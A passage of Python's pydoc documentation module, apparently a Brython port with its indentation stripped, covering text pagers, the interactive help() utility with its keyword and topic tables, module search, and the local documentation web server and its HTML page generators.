return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = builtins
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'False': '',
'None': '',
'True': '',
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
#fix me brython
self.input = self._input or sys.stdin
self.output = self._output or sys.stdout
#fix me brython
#input = property(lambda self: self._input or sys.stdin)
#output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in ['True', 'False', 'None']:
# special case these keywords since they are objects too
doc(eval(request), 'Help on %s:')
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the interactive help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = list(sorted(items))
colw = width // columns
rows = (len(items) + columns - 1) // columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import formatter
buffer = io.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + ', '.join(xrefs.split()) + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''' , '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
try:
loader = importer.find_module(modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except Exception:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
try:
module = loader.load_module(modname)
except ImportError:
if onerror:
onerror(modname)
continue
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', '%s; charset=UTF-8' % content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the _pydoc.css style
sheet is read and returned if it exits.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
css_path = "pydoc_data/_pydoc.css"
css_link = (
'<link rel="stylesheet" type="text/css" href="%s">' %
css_path)
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Pydoc: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>
</body></html>''' % (title, css_link, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p align=right><font color="#909090" face="helvetica,'
'arial"><strong>pydoc</strong> by Ka-Ping Yee'
'<ping@lfw.org></font>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading(
'<big><big><strong>Search Results</strong></big></big>',
'#ffffff', '#7799ee')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection(
'key = %s' % key, '#ffffff', '#ee77aa', '<br>'.join(results))
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with tokenize.open(path) as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading(
'<big><big><strong>File Listing</strong></big></big>',
'#ffffff', '#7799ee')
contents = heading + html.bigsection(
'File: %s' % path, '#ffffff', '#ee77aa', body)
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Topics', '#ffffff', '#ee77aa', contents)
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Keywords', '#ffffff', '#ee77aa', contents)
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'KEYWORD'
else:
title = 'TOPIC'
heading = html.heading(
'<big><big><strong>%s</strong></big></big>' % title,
'#ffffff', '#7799ee')
contents = '<pre>%s</pre>' % html.markup(contents)
contents = html.bigsection(topic , '#ffffff','#ee77aa', contents)
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.section('Related help topics: ',
'#ffffff', '#ee77aa', xrefs)
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading(
'<big><big><strong>Error</strong></big></big>',
'#ffffff', '#7799ee')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, '#ffffff', '#bb0000',
contents)
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if content_type == 'text/css':
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, url)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and x.find(os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
